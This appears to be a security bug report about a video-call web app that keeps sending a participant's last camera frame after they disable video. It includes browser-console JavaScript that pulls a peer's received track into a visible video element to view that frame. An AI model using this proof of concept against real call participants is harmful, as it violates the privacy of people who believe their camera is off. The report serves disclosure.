When a participant is in a call and that participant disables the video rather than a black frame the last frame of the video will be sent. Similarly, if the video is disabled before joining the call the last frame of the video before joining the call will be sent.
The video is not directly visible in the Web UI, as the received video is initially disabled and only shown once some media is received. However, it may be briefly visible in the Android app, as the Android app has the opposite behaviour, it assumes that the received video is enabled and then disables it once the video state is received. The iOS app has not been checked.
In any case, as the frame is sent it can be accessed in the WebUI by assigning the track to a manually created video element, as described in the steps below.
videoElement = document.createElement('video')
document.body.appendChild(videoElement)
videoElement.srcObject = new MediaStream()
videoElement.srcObject.addTrack(OCA.Talk.SimpleWebRTC.webrtc.peers[0].pc.getReceivers()[1].track)
videoElement.style.zIndex = 10000000
videoElement.style.position = 'absolute'
videoElement.style.top = 0
videoElement.play()
An attacker could see the last video frame of any participant who has video disabled but a camera selected.